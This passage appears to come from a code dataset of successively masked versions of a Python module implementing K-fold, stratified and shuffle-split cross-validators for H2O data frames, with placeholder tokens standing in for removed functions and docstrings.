random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
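The step string above ends with _make_test_folds, which spreads each class across the test folds by walking one KFold per class in lockstep. Below is a minimal editorial sketch of that assignment using plain NumPy in place of the H2OFrame plumbing; the names fold_idx and cls_mask are mine, not the module's.

import numpy as np
from sklearn.model_selection import KFold

target = np.array(['a', 'a', 'a', 'b', 'b', 'b', 'b'])
n_folds = 2
test_folds = np.zeros(target.shape[0], dtype=int)
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = np.bincount(y_inversed)
# One KFold per class; zip(*...) advances all of them together so each
# class is spread as evenly as possible over the test folds.
per_cls_cvs = [KFold(n_folds).split(np.zeros(max(count, n_folds)))
               for count in y_counts]
for fold_idx, per_cls_splits in enumerate(zip(*per_cls_cvs)):
    for cls, (_, test_split) in zip(unique_y, per_cls_splits):
        cls_mask = target == cls
        cls_test_folds = test_folds[cls_mask]
        # Guard against the padding used when a class has fewer than
        # n_folds rows (np.zeros(max(count, n_folds)) above).
        test_split = test_split[test_split < len(cls_test_folds)]
        cls_test_folds[test_split] = fold_idx
        test_folds[cls_mask] = cls_test_folds
print(test_folds)  # [0 0 1 0 0 1 1]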
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, 